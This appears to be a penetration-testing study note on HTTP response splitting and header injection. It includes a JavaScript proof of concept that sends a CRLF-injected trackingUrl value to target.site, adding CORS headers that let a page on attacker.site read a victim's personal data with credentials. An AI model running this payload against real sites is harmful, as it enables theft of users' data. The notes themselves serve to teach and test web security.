HTTP Response Splitting

The HTTP standard uses \r\n as part of it syntax/parsing to establish where data starts and headers end. Because of this an attacker may be able to prematurely split the response header and have a single response interpreted as 2 responses effectively creating 2 response blocks. This functionality can be abused.

This is different from Header Injection attacks where we are instead adding new headers to a single response block.

Things to look for:

Application puts user input into a response header
Set-Cookie is a good value to test
Sites that pull referral domains to track your last visited site.
There may be sanitation to avoid

Example from eLearn:

This split response will make the browser load the second response into the browser. This response can contain such things as XSS and Apparent Defacement.

SOP Bypass (header injection):

Then the attacker would host an evil file at attacker.site/evil.php that will preform a JS call within the php to do a cross-domain AJAX request to steal data from the target domain.

<script>
function loadXMLDoc()
    {
    var xmlhttp;
    xmlhttp=new XMLHttpRequest();
    xmlhttp.withCredentials =true;
    xmlhttp.onreadystatechange=function()
        {
        if (xmlhttp.readyState==4 && xmlhttp.status==200){
            document.getElementById("responseDiv").innerHTML=xmlhttp.responseText;
            }
    }
xmlhttp.open("GET","http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAccess-Control-Allow-Origin;%20http://attacker.site%0d%0aAccess-Control-Allow-Credentials:%20true",true);
    xmlhttp.send();
    }</script>

If the response splitting is not a vulnerable vector then the cross-origin request will be blocked.

PreviousAdobe SWF Investigator NextFlash 101

Last updated 3 years ago

Was this helpful?